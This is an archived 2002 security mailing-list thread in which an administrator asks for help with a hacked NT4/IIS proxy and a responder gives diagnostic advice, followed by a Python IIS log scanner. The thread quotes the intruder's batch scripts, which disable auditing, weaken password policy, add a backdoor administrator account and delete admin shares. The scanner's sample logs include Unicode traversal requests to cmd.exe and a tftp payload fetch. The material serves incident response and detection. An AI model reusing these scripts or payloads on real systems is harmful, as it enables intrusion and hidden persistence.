RE: Proxy server hit... Any ideas?

From: Othenin-Girard Pascal (pascal.othenin-girardat_private)
Date: Wed Nov 20 2002 - 00:16:15 PST

    Hello,
    
    Well, I would say that you've probably been hacked in order for the
    warez scene to distribute some stuff.....
    
    	2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    	srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    	Routine), and _zoLibr.dll
    
    and you're probably running a Serv-U FTP server. Doing a "netstat -an" should
    list all connections of the machine, where you should see if more
    services than needed are running. And check for some *.rar, *.zip; if you
    are distributing warez you should find some GB of those somewhere.
    
    Other files have been renamed in an attempt to obfuscate the real
    files' usage. Bet you are also hosting some kind of iroffer (an IRC bot doing
    XDCC serving).
    
    To be sure of that, you can grab the file
    
    http://linux20368.dn.net/protools/files/utilities/fi.zip
    (this is an exe file identifier; it will identify the packer if it knows it)
    
    and see what it reports for each file you've found. Most probably the files are
    packed; a good bet would be UPX. Grab it from the main web site, and you
    may be able to unpack the files using the command upx -d <new_dumped_exe>
    
    From there you can take the files into any hex editor/disassembler in order
    to find a way to identify the product. File properties may be sufficient for
    this.
    Once you've done that, you should have a good idea of what has been
    installed, and in which order; the last point is to find out how they first
    came in.
    
    Are you running IIS on your proxy? (\scripts\sample\) If so you've
    probably been hit by a Unicode attack. Search for the following pattern in your
    proxy log file:
    "cmd.exe" or "/dir+c" (this is the usual vuln test). And if you found some
    installed stuff like FTP servers and bots, and found tracks of the attack in
    your log, then a good bet would be that the attack has been successful.....
    
    Hope this helps
    Regards
    P.Girard
    
    P.S. You should definitely remove the sample script folder from a
    production computer. Not a good idea to keep them. You should also try
    the Microsoft Lockdown tools, which do a good job securing IIS....
    
    
    
    > -----Original Message-----
    > From:	Mike Cain [SMTP:mikecat_private]
    > Date:	Monday, 18 November 2002 15:01
    > To:	incidentsat_private
    > Subject:	Proxy server hit... Any ideas?
    > 
    > Well, I have had my first run-in with a hacker, or was it a virus? I'm
    > not 100% sure.. Guess I should start from the beginning...
    > 
    > A few days ago, I began to get user complaints on the slowness of the
    > internet. I figured it was mostly them just wanting something to
    > complain about, so I did what all crappy admins do, I ignored it. Well,
    > last night the box was rebooted after some software was updated. Today
    > people were complaining about how PAINFULLY slow the internet was, so I
    > looked at the proxy server. NT4 running proxy3. I know, there is newer,
    > better stuff, but it's what I have to work with. :) SO... I looked at the
    > processes and noticed the CPU hovering at 35-50%.. Way too high. So a
    > quick look at the process list showed two things that I didn't remember
    > needing to be there, win.exe and start.exe. Next move was to find them,
    > and they were in the winnt\system\ folder. What I also found odd was
    > that there were three new folders in that directory, all created on the
    > 8th: NT, tools, and win.
    > 
    > Here are the contents, respectively.
    > 1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
    > backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
    > (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
    > 
    > 2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    > srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    > Routine), and _zoLibr.dll
    > 
    > 3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
    > x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
    > win.exe, x32.dll.bkup
    > 
    > SO, anyone know what I have or what hit me? From looking at the secure
    > and secure1 batch files, it looks like a root kit... But I'm new at
    > this side of security (I'm a Cisco guy...)
    > 
    > Last thing, the logs show that the attacker was hitting the
    > \scripts\sample\ folder... Meaning I think he was trying to use the old
    > IIS Sample Scripts to execute local code... Not sure if he was
    > successful...
    > 
    > Thanks in advance!!
    > 
    > Mike Cain
    > CCNP/MCSE
    > 
    > 
    > Secure.bat =
    > @echo off
    > del temp
    > echo Compiling New Security Policy ...
    > echo [Version] >> temp
    > echo signature="$CHICAGO$" >> temp
    > echo Revision=1 >> temp
    > echo [Profile Description] >> temp
    > echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
    > echo [System Access] >> temp
    > echo MinimumPasswordAge = 0 >> temp
    > echo MaximumPasswordAge = 42 >> temp
    > echo MinimumPasswordLength = 0 >> temp
    > echo PasswordComplexity = 0 >> temp
    > echo PasswordHistorySize = 0 >> temp
    > echo LockoutBadCount = 0 >> temp
    > echo RequireLogonToChangePassword = 0 >> temp
    > echo ClearTextPassword = 0 >> temp
    > echo [Event Audit] >> temp
    > echo AuditSystemEvents = 0 >> temp
    > echo AuditLogonEvents = 0 >> temp
    > echo AuditObjectAccess = 0 >> temp
    > echo AuditPrivilegeUse = 0 >> temp
    > echo AuditPolicyChange = 0 >> temp
    > echo AuditAccountManage = 0 >> temp
    > echo AuditProcessTracking = 0 >> temp
    > echo AuditDSAccess = 0 >> temp
    > echo AuditAccountLogon = 0 >> temp
    > echo [Registry Values] >> temp
    > echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
    > echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
    > echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
    > echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
    > echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
    > echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
    > echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
    > echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
    > echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
    > echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
    > echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
    > echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
    > echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
    > echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
    > echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
    > echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
    > echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
    > echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
    > echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
    > echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
    > echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
    > echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
    > echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
    > echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
    > echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
    > echo [Privilege Rights] >> temp
    > echo seassignprimarytokenprivilege = >> temp
    > echo seauditprivilege = >> temp
    > echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    > echo sebatchlogonright = >> temp
    > echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
    > echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
    > echo secreatepermanentprivilege = >> temp
    > echo secreatetokenprivilege = >> temp
    > echo sedebugprivilege = *S-1-5-32-544 >> temp
    > echo sedenybatchlogonright = >> temp
    > echo sedenyinteractivelogonright = >> temp
    > echo sedenynetworklogonright = >> temp
    > echo sedenyservicelogonright = >> temp
    > echo seenabledelegationprivilege = >> temp
    > echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
    > echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
    > echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
    > echo seloaddriverprivilege = *S-1-5-32-544 >> temp
    > echo selockmemoryprivilege = >> temp
    > echo semachineaccountprivilege = >> temp
    > echo senetworklogonright = %1 >> temp
    > echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    > echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
    > echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    > echo sesecurityprivilege = *S-1-5-32-544 >> temp
    > echo seservicelogonright = >> temp
    > echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
    > echo sesyncagentprivilege = >> temp
    > echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
    > echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
    > echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    > echo setakeownershipprivilege = *S-1-5-32-544 >> temp
    > echo setcbprivilege = >> temp
    > echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
    > echo Adding User %1 with the Password %2 ...
    > net user /add slash 971985
    > echo Adding slash to the Local Administrator Group ...
    > net localgroup administrators slash /add
    > echo Loading New Security Policy ...
    > secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
    > echo System is now secure.
    > 
    > 
    > 
    > Secure1.bat
    > 
    > net share /delete C$ /y > net.deld
    > net share /delete D$ /y >> net.deld
    > net share /delete E$ /y >> net.deld
    > net share /delete F$ /y >> net.deld
    > net share /delete G$ /y >> net.deld
    > net share /delete H$ /y >> net.deld
    > net share /delete I$ /y >> net.deld
    > net share /delete J$ /y >> net.deld
    > net share /delete K$ /y >> net.deld
    > net share /delete L$ /y >> net.deld
    > net share /delete M$ /y >> net.deld
    > net share /delete N$ /y >> net.deld
    > net share /delete O$ /y >> net.deld
    > net share /delete P$ /y >> net.deld
    > net share /delete Q$ /y >> net.deld
    > net share /delete R$ /y >> net.deld
    > net share /delete S$ /y >> net.deld
    > net share /delete T$ /y >> net.deld
    > net share /delete U$ /y >> net.deld
    > net share /delete V$ /y >> net.deld
    > net share /delete W$ /y >> net.deld
    > net share /delete X$ /y >> net.deld
    > net share /delete Y$ /y >> net.deld
    > net share /delete Z$ /y >> net.deld
    > net share /delete ADMIN$ /y >> net.deld
    > #net share /delete IPC$ /y >> net.deld
    > del net.deld
    > 
    > 
    > 
    > --------------------------------------------------------------------------
    > --
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    
    
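One way to run the log check Pascal suggests, as an added example that is not code from either poster: it scans constructed IIS W3C-extended log lines for the "cmd.exe" and "dir+c" patterns he names, after undoing the percent-encoding and overlong-UTF-8 tricks the Unicode traversal relies on, and marks requests that IIS answered with 200, since those are the ones where the command most likely ran. The log field layout, the IP addresses and the sample requests are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-extended log lines, not from the original post (documentation IPs).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-11-08 03:12:41 192.0.2.10 GET /scripts/sample/test.htm - 200
2002-11-08 03:12:55 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-11-08 03:13:02 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-11-08 03:13:30 192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+203.0.113.5+GET+start.exe 200
2002-11-08 09:00:12 198.51.100.7 GET /index.html - 200
"""

def decode_path(raw: str) -> str:
    """Decode twice (so %255c becomes '\\') and map the overlong UTF-8 forms
    %c0%af and %c1%9c that unpatched IIS accepted as '/' and '\\'."""
    b = unquote_to_bytes(unquote_to_bytes(raw))
    b = b.replace(b"\xc0\xaf", b"/").replace(b"\xc1\x9c", b"\\")
    return b.decode("latin-1").lower()

def classify(uri_stem: str, query: str) -> list:
    """Indicators present in one request, most serious first."""
    path, q = decode_path(uri_stem), decode_path(query)
    hits = []
    if re.search(r"\.\.[\\/]", path):
        hits.append("traversal")       # '..' escaped the /scripts virtual directory
    if "cmd.exe" in path:
        hits.append("cmd.exe")
    if "dir+c" in q:
        hits.append("dir+c")           # the usual 'does it work?' probe
    if "tftp" in q:
        hits.append("tftp")            # a payload being pulled onto the box
    if "/scripts/sample/" in path:
        hits.append("sample-scripts")  # poking at the IIS sample scripts
    return hits

def scan(log_text: str) -> list:
    """One finding per suspicious line; 'executed' is True when IIS answered
    200 to a cmd.exe request, i.e. the command almost certainly ran."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0].startswith("#"):
            continue
        ip, stem, query, status = fields[2], fields[4], fields[5], fields[6]
        hits = classify(stem, query)
        if hits:
            findings.append({"ip": ip, "uri": stem, "status": status, "hits": hits,
                             "executed": status == "200" and "cmd.exe" in hits})
    return findings
```

Grep-style matching on the raw line would miss the %255c and %c0%af variants, which is why the decode step comes first.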



    This archive was generated by hypermail 2b30 : Thu Nov 21 2002 - 16:54:12 PST